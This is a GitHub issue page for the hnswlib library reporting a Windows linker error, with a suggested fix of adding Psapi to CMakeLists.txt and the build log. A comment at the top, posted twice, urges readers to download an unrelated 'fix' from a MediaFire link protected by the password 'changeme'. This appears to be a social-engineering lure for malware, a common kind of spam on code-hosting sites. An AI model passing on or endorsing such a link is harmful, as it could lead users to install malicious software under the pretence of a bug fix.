You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
hnswlib/CMakeLists.txt
Line 104 in c1b9b79
target_link_libraries(main hnswlib Psapi)
should add Psapi
otherwise:
[100%] Linking CXX executable main.exe
CMakeFiles\main.dir/objects.a(sift_1b.cpp.obj):sift_1b.cpp:(.text+0x368d): undefined reference to
GetProcessMemoryInfo'CMakeFiles\main.dir/objects.a(sift_1b.cpp.obj):sift_1b.cpp:(.text+0x4333): undefined reference to
GetProcessMemoryInfo'CMakeFiles\main.dir/objects.a(sift_1b.cpp.obj):sift_1b.cpp:(.text+0x4c48): undefined reference to `GetProcessMemoryInfo'collect2.exe: error: ld returned 1 exit statusmake[2]: *** [CMakeFiles\main.dir\build.make:116: main.exe] Error 1
make[1]: *** [CMakeFiles\Makefile2:502: CMakeFiles/main.dir/all] Error 2
make: *** [Makefile:135: all] Error 2
The text was updated successfully, but these errors were encountered: